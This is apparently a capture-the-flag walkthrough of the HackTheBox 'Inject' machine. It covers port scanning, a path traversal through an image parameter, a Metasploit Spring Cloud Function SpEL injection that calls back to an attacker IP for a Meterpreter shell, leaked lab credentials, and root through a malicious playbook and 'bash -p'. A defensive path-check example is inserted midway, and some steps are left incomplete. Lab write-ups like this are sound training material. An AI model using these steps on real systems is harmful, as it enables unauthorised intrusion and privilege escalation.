Inject HackTheBox Walkthrough
Inject is a Linux machine and is regarded as an easy box. We'll start with a basic port scan and work our way forward from there. After enumeration, we will use the file upload function to obtain a username and password, and look for vulnerabilities that may exist in a specific software version. We will then use a password disclosure vulnerability to collect plaintext credentials and move laterally. The next task is to get local user access, from which we can reach root by finding a playbook vulnerability.
Table of contents
The Beginning
- Initial Nmap Port Scan
- Web Page Enumeration
- Directory enumeration
- Uploads image and Enumeration
- Spring cloud function Injection
- User Shell
- User Flag
Privilege Escalation
- Finding Privilege Escalation Vectors
- Playbook Vulnerability
- Root Flag
The Beginning
We'll begin the evaluation with the standard TCP/IP port scanning.
Initial Nmap Port Scan
Using nmap, we first do a port scan to identify the target host's open ports and active services. Kali Linux includes Nmap, a well-known port scanning programme. We used the flags -sV and -sC to run service version detection and the default NSE scripts against the target machine during the port scan.
Flags features:
-sV: Attempts to determine the service version
-sC: Scans with default NSE scripts
nmap -sV -sC 10.10.11.204
Web Page Enumeration
We enumerate port 8080 and access it in the browser, which shows a cloud service provider website with eCommerce features. Nothing looks interesting on the web page, so we decided to move on to directory enumeration.
Directory Enumeration
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response.
After the enumeration, we open the upload page.
We intercepted the HTTP request for the POST method, which includes a file in PNG format.
Change the request to GET and change the path to:
/show-image?img=../
/show-image?img=../../../../../../..
After multiple tries, we find the settings.xml file.
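A defensive counterpart to the /show-image?img=../ behaviour above, as an added example that is not code from the box or from this walkthrough: a containment check that a file-serving handler can apply to the img parameter before reading anything from disk. It is written in Python for illustration; the function names and the temporary directory layout are assumptions constructed for the example.

```python
import os
import tempfile

def naive_resolve(base_dir, img):
    # Vulnerable pattern: the parameter is joined to the base directory
    # unchecked, so "../" segments walk out of it.
    return os.path.normpath(os.path.join(base_dir, img))

def safe_resolve(base_dir, img):
    """Return the real path of img inside base_dir, or None if it escapes."""
    base = os.path.realpath(base_dir)
    if "\x00" in img or os.path.isabs(img):
        return None
    # realpath collapses "../" and follows symlinks before the containment check
    candidate = os.path.realpath(os.path.join(base, img))
    # commonpath compares whole path components, so a sibling such as
    # "uploads_old" does not pass for "uploads" (a plain startswith would)
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None  # directories such as "../" are never served as listings
    return candidate

def demo():
    # Constructed layout: an uploads directory, a sibling directory, and a
    # sensitive file outside the uploads directory.
    root = os.path.realpath(tempfile.mkdtemp())
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.mkdir(os.path.join(root, "uploads_old"))
    for name in ("uploads/cat.png", "secret.xml", "uploads_old/x.png"):
        with open(os.path.join(root, name), "w") as f:
            f.write("constructed sample")
    os.symlink(os.path.join(root, "secret.xml"), os.path.join(uploads, "link.png"))
    requests = ["cat.png", "../", "../../../../../../..", "../secret.xml",
                "../uploads_old/x.png", "link.png", "/etc/passwd"]
    verdicts = {r: safe_resolve(uploads, r) is not None for r in requests}
    escaped = naive_resolve(uploads, "../secret.xml") == os.path.join(root, "secret.xml")
    return verdicts, escaped

if __name__ == "__main__":
    verdicts, naive_escaped = demo()
    for req, ok in verdicts.items():
        print(f"{req!r:28} -> {'served' if ok else 'rejected'}")
    print("naive join escaped base dir:", naive_escaped)
```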
After the enumeration, we use Metasploit:
use exploit/multi/http/spring_cloud_function_spel_injection
set lhost 10.10.14.31
set rhost 10.10.11.204
This gives us a Meterpreter shell, which we can use to access the local user.
We don't have access to the user.txt file. After multiple tries, we find a username and password in the settings.xml file:
username: phil
password: DocPhillovestoInject123
Finding Privilege Escalation Vectors:
After getting user.txt, we are able to see linpeas.sh, which is helpful for enumeration.
After the script finished running, we found something interesting.
Playbook Vulnerability:
We search Google for "playbook vulnerability".
Create a file named playbook_2.yml and download it:
python -m SimpleHTTPServer 80
After the download, run the following commands
Root Flag:
ls /bin/bash
/bin/bash
ls /bin/bash
bash -p